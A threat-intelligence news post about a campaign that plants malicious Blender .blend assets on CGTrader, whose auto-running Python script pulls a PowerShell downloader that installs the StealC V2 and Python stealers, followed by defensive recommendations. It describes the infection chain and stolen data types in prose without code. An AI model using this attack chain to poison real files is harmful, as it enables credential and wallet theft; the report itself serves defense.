When 3D Creativity Becomes a Trap: Threat Actors Turn Blender Assets into a Stealing Pipeline
- Javier Conejo del Cerro
- hace 4 minutos
- 3 Min. de lectura
A new campaign shows how a single overlooked feature inside a creative tool can become the perfect opening for cybercriminals. For at least six months, threat actors have been quietly poisoning the 3D design ecosystem by uploading malicious Blender .blend assets to public marketplaces such as CGTrader. These files, once opened by unsuspecting artists, animators, or developers, automatically execute embedded Python scripts that download StealC V2 and a secondary stealer—transforming a harmless 3D model into the entry point for large-scale credential theft, crypto-wallet compromise, and full system profiling. The operation mirrors past campaigns tied to Russian-speaking actors and highlights once again how creative communities have become high-value targets in modern cybercrime.
Phase 1: Seeding the Trap — Malicious Blender Files as Initial Access
The attackers’ first phase revolves around infiltration through supply-chain poisoning of online 3D marketplaces. They upload .blend files that appear to be legitimate assets—character rigs, props, or animation-ready models—capitalizing on Blender’s popularity and the trust users place in well-established platforms like CGTrader. Inside these files, the adversaries embed a Python script (Rig_Ui.py) that will automatically execute when opened if Blender’s Auto Run feature is enabled.
This dependency on Auto Run is crucial: Blender explicitly warns that embedded Python scripts can perform arbitrary actions without user prompts. For advanced rigging, this is a feature—but in the wrong hands, it becomes a turnkey exploit. By relying on real Blender functionality rather than an external binary, the attackers bypass sandboxing, virtualization heuristics, and many security controls that rarely monitor creative tools.
This tactic echoes a previous campaign attributed to Russian-speaking actors who impersonated the Electronic Frontier Foundation (EFF) to distribute StealC and Pyramid C2. The similarities—in decoy usage, embedded scripting, and stealthy post-execution behavior—strongly suggest shared tactics, techniques, and possible operator overlap.
Phase 2: Silent Execution — Auto Run and Python Abuse Inside Blender
When the victim opens the .blend file, the Python script immediately triggers background execution. Blender’s Auto Run, if not manually disabled, interprets the embedded script without displaying warnings. The malicious logic retrieves a PowerShell script that downloads two ZIP archives from remote servers controlled by the attackers.
The first archive contains StealC V2, the latest upgrade of the StealC stealer family announced in April 2025. The second archive contains an additional Python-based stealer, ensuring redundancy and broader data coverage. This multi-payload strategy enables the operators to run parallel data-exfiltration pipelines.
StealC V2 is engineered to target a wide spectrum of sensitive data sources:
23 browsers (including Chromium-based and Firefox-based families)
100 browser plugins and extensions
15 cryptocurrency wallet applications
Messaging clients
VPN services
Email clients
Together, the two stealers provide deep visibility into stored credentials, browser sessions, wallet secrets, communication histories, plugin tokens, and system metadata.
Phase 3: Data Theft — Exfiltration at Scale
Once inside the system, StealC V2 begins harvesting information with minimal footprint. Its improved version introduces:
Expanded browser-session extraction
Token and plugin harvesting
Crypto-wallet key retrieval
System fingerprinting
Silent persistence mechanisms
The Python-based secondary stealer offers additional coverage, ensuring that if one payload fails or is detected, the other continues collecting high-value artifacts.
Given Blender’s typical ecosystem—machines equipped with GPUs, large project files, cloud storage sync, and dedicated workstations—the attackers can reliably capture high-value host profiles that bypass cloud sandbox analysis. Creative-industry endpoints are often hardware-rich but under-protected, making them ideal targets for stealers seeking financial assets or corporate credentials.
Measures to Fend Off the Attack
Keep Blender’s Auto Run disabled unless the .blend file is from a fully trusted and verified source.
Enforce asset provenance checks for any Blender files sourced from public marketplaces like CGTrader.
Block PowerShell-based download executions, especially those triggered by non-administrative applications.
Monitor for ZIP-based loaders, Python scripts launched from Blender processes, and suspicious PowerShell spawns.
Deploy EDR/XDR with behavioral detection capable of identifying StealC V2 patterns, Python-based stealers, and browser/wallet data-extraction activity.
Restrict or audit network traffic from Blender processes, which should not normally perform PowerShell-driven outbound connections.
Educate creative teams on file-integrity risks and the dangers of Auto Run in toolchains that support embedded scripting.
This campaign highlights a growing trend: creative software ecosystems are becoming part of the cyberattack surface. By abusing Blender’s Auto Run scripting capability and the trust placed in user-generated marketplaces, attackers transformed routine asset downloads into direct infection channels. The combination of StealC V2, a Python-based stealer, and stealthy Auto Run execution demonstrates how threat actors now exploit legitimate workflows to bypass traditional controls. As creative industries and technical teams become increasingly interconnected, organizations must reevaluate how seemingly safe tools fit into their threat models. What appears to be a harmless 3D asset may in reality be a delivery system for credential theft and long-term compromise.
The Hacker News
Comentarios